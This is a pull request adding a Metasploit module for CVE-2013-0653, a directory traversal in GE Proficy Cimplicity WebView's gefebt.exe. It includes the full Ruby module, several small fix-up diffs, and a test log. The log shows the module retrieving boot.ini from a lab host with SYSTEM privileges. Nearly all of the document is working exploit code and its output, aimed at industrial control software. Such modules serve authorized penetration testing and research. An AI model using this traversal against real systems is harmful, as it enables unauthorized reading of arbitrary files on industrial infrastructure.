### PR TITLE
Add module for CVE-2013-0653

### DIFF
--- a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb
+++ b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb
@@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
     res = sock.get_once
     disconnect
 
-    if res and res =~ /gefebt.exe/
+    if res and res =~ /gefebt\.exe/
       return true
     else
       return false

--- a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb
+++ b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
       'References'  =>
         [
           [ 'CVE', '2013-0653' ],
-          [ 'OSVDB', '89489' ],
+          [ 'OSVDB', '89490' ],
           [ 'BID', '57505' ],
           [ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-022-02' ]
         ],

--- a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb
+++ b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb
@@ -1,0 +1,145 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'uri'
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'GE Proficy Cimplicity WebView substitute.bcl Directory Traversal',
+      'Description' => %q{
+        This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the
+        gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM
+        privileges.
+      },
+      'Author'       =>
+        [
+          'Unknown', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2013-0653' ],
+          [ 'OSVDB', '89489' ],
+          [ 'BID', '57505' ],
+          [ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-022-02' ]
+        ],
+      'DisclosureDate' => 'Jan 22 2013'))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI',[true, 'Path to CimWeb', '/CimWeb']),
+        OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
+        # By default gefebt.exe installed on C:\Program Files\GE Fanuc\Proficy CIMPLICITY\WebPages\CimWeb
+        OptInt.new('DEPTH', [true, 'Traversal depth', 5])
+      ], self.class)
+  end
+
+  def normalize_uri(*strs)
+    new_str = strs * "/"
+
+    new_str = new_str.gsub!("//", "/") while new_str.index("//")
+
+    # Makes sure there's a starting slash
+    unless new_str[0,1] == '/'
+      new_str = '/' + new_str
+    end
+
+    new_str
+  end
+
+  def target_uri
+    begin
+      # In case TARGETURI is empty, at least we default to '/'
+      u = datastore['TARGETURI']
+      u = "/" if u.nil? or u.empty?
+      URI(u)
+    rescue ::URI::InvalidURIError
+      print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
+      raise Msf::OptionValidateError.new(['TARGETURI'])
+    end
+  end
+
+  def my_basename(filename)
+    return ::File.basename(filename.gsub(/\\/, "/"))
+  end
+
+  def is_proficy?
+    connect
+    req =  "GET #{normalize_uri(target_uri.path, "index.html")} HTTP/1.0\r\n\r\n"
+    sock.put(req)
+    res = sock.get_once
+    disconnect
+
+    if res and res =~ /gefebt.exe/
+      return true
+    else
+      return false
+    end
+  end
+
+  # We can't use the http client msf mixin because the Proficy Web server
+  # return a malformed HTTP response with the file contents, there aren't
+  # two new lines (but one) between the HTTP headers and the body content.
+  def read_file(file)
+    travs = ""
+    travs << "../" * datastore['DEPTH']
+    travs << file
+
+    print_status("#{@peer} - Retrieving file contents...")
+
+    connect
+    req =  "GET #{normalize_uri(target_uri.path, "gefebt.exe")}?substitute.bcl+FILE=#{travs} HTTP/1.0\r\n\r\n"
+    sock.put(req)
+    res = sock.get_once
+    disconnect
+
+    if res and res =~ /HTTP\/1\.0 200 OK/
+      return res
+    else
+      return nil
+    end
+
+  end
+
+  def run
+    @peer = "#{rhost}:#{rport}"
+
+    print_status("#{@peer} - Fingerprinting GE Proficy")
+    if is_proficy?
+      print_good("#{@peer} - Login successful")
+    else
+      print_error("#{@peer} - GE proficy not found")
+      return
+    end
+
+    contents = read_file(datastore['FILEPATH'])
+    if contents.nil?
+      print_error("#{@peer} - File not downloaded")
+      return
+    end
+
+    file_name = my_basename(datastore['FILEPATH'])
+    path = store_loot(
+        'hp.imc.faultdownloadservlet',
+        'application/octet-stream',
+        rhost,
+        contents,
+        file_name
+    )
+    print_good("#{rhost}:#{rport} - File saved in: #{path}")
+
+  end
+
+end

--- a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb
+++ b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
       'Description' => %q{
         This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the
         gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM
-        privileges.
+        privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5.
       },
       'Author'       =>
         [

--- a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb
+++ b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb
@@ -116,9 +116,9 @@ class Metasploit3 < Msf::Auxiliary
   def run
     @peer = "#{rhost}:#{rport}"
 
-    print_status("#{@peer} - Fingerprinting GE Proficy")
+    print_status("#{@peer} - Checking if it's a GE Proficy Application...")
     if is_proficy?
-      print_good("#{@peer} - Login successful")
+      print_good("#{@peer} - Check successful")
     else
       print_error("#{@peer} - GE proficy not found")
       return


### PR DESCRIPTION
Tested with GE Proficy Cimplicity 7.5:

```
msf auxiliary(ge_proficy_substitute_traversal) > run

[*] 192.168.172.244:80 - Checking if it's a GE Proficy Application...
[+] 192.168.172.244:80 - Check successful
[*] 192.168.172.244:80 - Retrieving file contents...
[+] 192.168.172.244:80 - File saved in: /Users/juan/.msf4/loot/20130906161019_default_192.168.172.244_hp.imc.faultdown_042591.ini
[*] Auxiliary module execution completed
msf auxiliary(ge_proficy_substitute_traversal) > cat /Users/juan/.msf4/loot/20130906161019_default_192.168.172.244_hp.imc.faultdown_042591.ini
[*] exec: cat /Users/juan/.msf4/loot/20130906161019_default_192.168.172.244_hp.imc.faultdown_042591.ini

HTTP/1.0 200 OK
Server: CIMPLICITY-HttpSvr/1.0
Date: Fri, 06 Sep 2013 21:10:18 GMT
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
```
